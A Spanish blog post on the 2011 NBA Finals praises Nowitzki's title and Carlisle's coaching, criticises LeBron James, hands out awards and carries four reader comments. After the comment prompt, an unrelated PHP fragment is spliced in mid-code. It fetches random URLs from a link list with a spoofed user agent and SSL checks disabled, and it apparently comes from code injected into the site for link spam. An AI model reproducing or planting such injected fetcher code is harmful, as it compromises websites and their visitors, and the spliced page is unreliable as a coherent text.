La Gran Final: Mavs 4 – Heat 2

15 de June de 2011 por TheDeerHunter

Bien está lo que bien acaba. No será una frase con la que coincidirá todo el mundo, referida al asunto que nos ocupa. No lo sentirán así los fans y simpatizantes de los Miami Heat con la herida aún demasiado reciente, como tampoco alguno de los seguidores de Lakers, Celtics, Spurs u Orlando que quizás esperara algo más en esta temporada que concluye. Para el resto, menos pendientes del resultado concreto, son muchos los motivos para haber acabado satisfechos.

Ha sido una final brillante, emocionante, sorprendente e intensa. Cargada de épica, de rivalidad, de contrastes, de revancha, de historias particulares y también de historia viva de la competición. Digno colofón a unos excelentes playoffs y a una interesante regular season. Se palpa la alegría en el ambiente. La mayor de las razones, diría, es ese primer e inesperado anillo para algunos grandes jugadores que nos han hecho felices durante la última década. El final feliz de sus, hasta ahora, infructuosos recorridos. Tantos malos momentos y tantas decepciones con las que es fácil sentirse identificados. La reconfortante sensación de justicia y una espina clavada que, de alguna manera, nos han sacado a todos. Independientemente de colores y de simpatías podemos decir que Nowitzki, Kidd, Stojakovic… e incluso Marion, Chandler, Terry… merecían vivir un triunfo como éste. Tiempos de revancha, tiempos de justicia.

Otro punto que puede causar esa satisfacción, éste más subjetivo, es el modelo y el estilo que ha terminado imponiéndose. El eterno debate que no terminará aquí del enfoque colectivo frente a la concentración de talento, del juego ofensivo frente al defensivo. Queda resuelto, al menos este año, a favor del sentido más romático del juego. Creo que ha quedado demostrado a lo largo de esta postemporada que ni uno ni otro eran representantes puros de ninguno de los extremos pero el principio generador sí perfila esa tendencia. Independientemente de todo ello los Mavericks han sido mejores arrastrando importantes bajas e incidencias. El extraordinario nivel mostrado, sobre todo en el 5 partido, difícilmente lo podría igualar nunca Miami y los habituales colapsos de estos últimos no han sido ninguna casualidad. Ha ganado el mejor. Eso siempre es bueno.

Por último tampoco nadie puede negar que los Heat han ido acumulando demasiados detractores. No es bueno alegrarse del mal ajeno pero así ha sido. No empezaron con buen pie en ese aspecto desde el show de “The Decision”, pero después ha ido a peor. Todo ese “mal karma”, que dijo LeBron, esa guerra contra el mundo, no les ayuda y ellos tampoco han hecho demasiado por cambiarlo. Falta de clase que decía Stevenson (le dijo el muerto al degollado). Mejorar su imagen sería el primer paso para poder centrarse en lo que más importa.

Ciñéndonos a los acontecimientos meramente deportivos nos vemos obligados a destacar la extraordinaria labor de Rick Carlisle como clave principal de este título. Primero por la gestión previa de sus recursos, logrando que una plantilla tan veterana y con bajas acumule ciento y pico partidos desde octubre sin aparente merma física. Después el reparto razonable de funciones, logrando simultáneamente alta eficiencia y máximo nivel de compromiso, con hasta 7-8 piezas enchufadas disponibles en todo momento. Se trata de un nivel de gestión que debería ser objeto de estudio y que deja en evidencia otras teorías y a otros colegas con mucho mejor cartel. A partir de ahí su “etiqueta” de técnico plano de regular se ha ido al suelo. Su capacidad de ajuste empieza a demostrarse en su propia persona, abriendo su perfil defensivo a la plantilla ofensiva que dispone. Esta final se ha ganado en la pizarra. La manera con la que se han ido negando las penetraciones o los contraataques, cómo se han ido encontrando soluciones a los sistemas defensivos de Spoelstra… y sobre todo quedará para los anales el cambio magistral de Barea en lugar de Stevenson cuando nadie lo había visto. ¿Quién hubiera vislumbrado al pequeño base de Dallas defendiendo a Wade y quién hubiera tenido lo que hay que tener para tomar esa decisión? Un acierto que vale un anillo.

A pesar del lógico sentimiento de fracaso no deberíamos restarle méritos a los Heat. La premisa de que la plantilla es netamente inferior a la de Dallas parece evidente y demostrada. La final pone a muchos en su sitio. Joel Anthony no es un center titular para un campeón por mucho que lo intente. Mucho menos Bibby como base titular. Fracaso aparentemente definitivo para él y punto negativo para quien lo fichó y para quien se ha empeñado en sacarlo todos los partidos desde el inicio. Tampoco Mike Miller ha terminado siendo lo que esperaban de él con tan sólo alguna eliminatoria bien jugada en todo el curso. No puedes esperar que House o Howard te saquen las castañas y no han pisado la cancha Ilgauskas ni James Jones en toda la serie. Pero seamos francos. La baza de los Heat ha sido siempre su trío de ases y ahí tenemos la principal causa de la derrota. Esta final de “King” James marcará para siempre su carrera. Su musculada espalda no ha podido sostener el peso de la responsabilidad y hemos visto un LeBron más empequeñecido que nunca. Sin él, los Heat son un equipo de primera ronda… y él no ha estado. Algunos adelantaron un problema que los hechos parecían desmentir. Wade y LeBron se pisan en estático. Se puede disimular si funciona la defensa, si se hartan a contraataques, si les dejan penetrar, si entran los tiros 1vs1 más inverosímiles… Todo se reduce a que si en una final, contra un equipo que sabe defender, tu trío exterior (Bibby-Wade-James pongamos) acierta tan poco en la larga distancia muy posiblemente perderás. Sin circulación y sin tiro ocurre esto: colapsos habituales que han terminado matándoles. Si encima deja de funcionar tu defensa olvídate. No es fácil ganar con un proyecto nuevo y los Heat han estado a punto de lograrlo. A menudo el fracaso es la mejor lección y el talento es la mejor materia prima para asimilar. Un poquito más de sensatez y sabiduría, algún retoque más y algún progreso personal y veremos a Miami campeones. Quizás el día que eso suceda podemos alegrarnos todos.

PREMIOS

MVP: Dirk  “Robin Hood” Nowitzki ¿Porqué eres tan bueno? Ni la sinusitis, ni la fiebre, ni el dedo roto, ni Bosh, ni Haslem, ni todos juntos han podido pararle. 26 puntos, 10 rebotes, 2 asistencias para culminar unas finales de leyenda. El primer europeo que lidera a su equipo al título y el mejor europeo NBA de la historia. Debemos revisar nuestras clasificaciones desde ya.

Sorpresa: El veredicto es unánime. La entrada de J.J. Barea al quinteto titular supuso el punto de inflexión de esta final y eso que Stevenson no lo estaba haciendo mal. Sus virtudes ofensivas las conocemos. Las defensivas son menos evidentes. Rápido, agresivo, incisivo e incómodo. No se puede decir que Wade haya abusado de él. Los números de Barea en esas últimas 3 memorables victorias han sido de más de 13 puntos y 5 asistencias en 26 minutos de media, con excelentes porcentajes de acierto. El tercer espada por detrás de Dirk y Terry.

Decepción: Nos quejábamos de las críticas patrio-americanas a Gasol, pero el castigo que está recibiendo LeBron James estas dos últimas semanas no tiene nombre. Sólo hay que darse una vuelta por la web para catar la calidad del pasteo que se está llevando y eso es sólo la punta del iceberg. Fue oírse que podía ser mejor que Jordan y todo irse a pique. Demasiada presión para cualquiera y él la ha abrazado de forma suicida. 8 puntos en el 4º y una capacidad casi sobrehumana de desaparecer en los últimos cuartos. En algunos niveles de exigencia no se puede caer más bajo. Cura de humildad de la que haría bien LeBron en tomar nota.

Esfuerzo en vano: Dwayne Wade, al lado de su amiguito LeBron, nos ha dejado algunos gestos este año que nos lo han desmitificado un poco. Su calidad baloncestística, sin embargo, está fuera de toda duda. 26.5 puntos (máximo anotador de las finales), 7 rebotes, 5 asistencias, 1.5 robos y 1.5 asistencias que merecen el mayor de los reconocimientos.

Comenta

4 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Un poco de justicia nunca viene mal. Ha sido una alegría deportiva como hacia mucho que no sentía.

    Grandes!!!!

      Citar

  2. German dice:
    #2

    Me alegre mucho con el titulo de los Mavs, un tanto por Dirk y Kidd y otro tanto por ver frustrado a LeBron y compañia, debo reconocerlo. Creo que la sensacion de justicia por el aleman la sentimos todos!

      Citar

  3. Blade Petrovic dice:
    #3

    Y como no Stevenson acaba en la cárcel después de la celebración

      Citar

  4. tobal dice:
    #4

    Por fin se ha hecho justicia,la franquicia de Dallas,merecía un anillo de campeón,a mí este equipo,me ha hecho disfrutar con su buen juego,en todos estos años,además de que un fuera de serie,como es Nowitzki,no podía retirarse sin anillo,en fin que por lo que veo en este blog,bastante gente se ha llevado una gran alegría,de que los Mavericks hayan sido campeones.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>